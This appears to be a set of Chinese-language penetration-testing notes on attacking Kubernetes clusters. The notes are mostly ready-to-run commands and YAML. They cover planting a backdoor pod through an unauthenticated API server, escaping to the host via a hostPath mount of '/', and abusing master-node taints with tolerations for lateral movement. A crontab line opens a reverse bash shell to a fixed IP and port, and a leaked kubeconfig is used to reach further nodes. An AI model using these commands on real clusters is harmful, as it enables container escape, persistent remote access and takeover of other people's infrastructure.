堡壘機滲透&漏洞利用
虛擬機器滲透 kvm qemu vmware esxi vshpere openstack
程式碼託管滲透 github gitlab 特有思路
K8S-橫向移動汙點Taint
如何判斷實戰中能否利用汙點Taint?
設定汙點
kubectl taint nodes node1 xtz=value1:NoSchedule
去除汙點
kubectl taint nodes node1 xtz:NoSchedule-
節點說明中,查詢 Taints 欄位
拿到node節點許可權時可以檢視其他node主機或者master主機是否支援用Taint汙點橫向移動
kubectl describe nodes node-name
實戰場景
1、攻擊Pod部署Web應用
Web應用部署:(struts2漏洞)
拉取靶場映象
kubectl create deployment xiaodi --image=vulhub/struts2:2.3.28
檢視pod容器的狀態(歸屬節點、內部IP、執行狀態等)
kubectl get pods -o wide
啟動靶場映象服務
kubectl expose deploy xiaodi --port=8080 --target-port=8080 --type=NodePort
kubectl get pod,svc
利用Web漏洞拿下許可權;
探針(CDK探測工具)當前Webshell環境是否是docker容器
兩種情況:
- 純在docker容器裡
- 在k8s下的某個主機裡的docker容器
CDK雲安全漏洞檢測工具
工具地址:https://github.com/cdk-team/CDK
搭建遠端下載&直接檔案上傳;
![[Pasted image 20250124154403.png]]
2、利用k8s-Api-Server未授權提交建立後門Pod
./cdk_linux_amd64 kcurl anonymous post 'https://10.96.0.1:443/api/v1/namespaces/default/pods/' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}'
或
./kubectl -s 10.96.0.1:443 create -f test.yaml
//test.yam就是{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}的值
檢視後門pod是否建立
curl -k https://10.96.0.1:443/api/v1/namespaces/default/pods
3、實現掛載目錄宿主機逃逸
目標主機下載webshell;
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec test02 -- bash -c "ls /host"
//host目錄就是掛載目錄,相當於宿主機的/目錄,可以自定義的。
4、利用汙點Taint橫向移動
參考:https://cn-sec.com/archives/1336486.html
獲取node節點詳情
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes | grep Taints
或
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a describe nodes
cat > x.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
name: control-master-xiaodi //自定義
spec:
tolerations:
- key: node-role.kubernetes.io/master //這裡要修改
operator: Exists
effect: NoSchedule
containers:
- name: control-master-xiaodi //自定義
image: ubuntu:18.04
command: ["/bin/sleep", "3650d"]
volumeMounts:
- name: master
mountPath: /master //自定義
volumes:
- name: master
hostPath:
path: /
type: Directory
EOF
建立一個新pod容器
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a create -f ./x.yaml
檢視新建pod容器歸屬
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a get pods -o wide
利用新建pod容器進行逃逸
./kubectl --server=https://10.96.0.1:443 --insecure-skip-tls-verify=true --username=a --password=a exec control-master -- bash -c "ls /master"
反彈master控制端的shell
echo -e '* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n' >> /master/etc/crontab
5、利用Config洩漏橫向移動
也可以利用節點洩漏的config橫向移動節點
./kubectl -s https://10.96.0.1:443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes
./kubectl apply -f test.yaml -n default --kubeconfig=config
./kubectl -n default --kubeconfig=config exec xiaodisec -- bash -c "ls /mnt/root"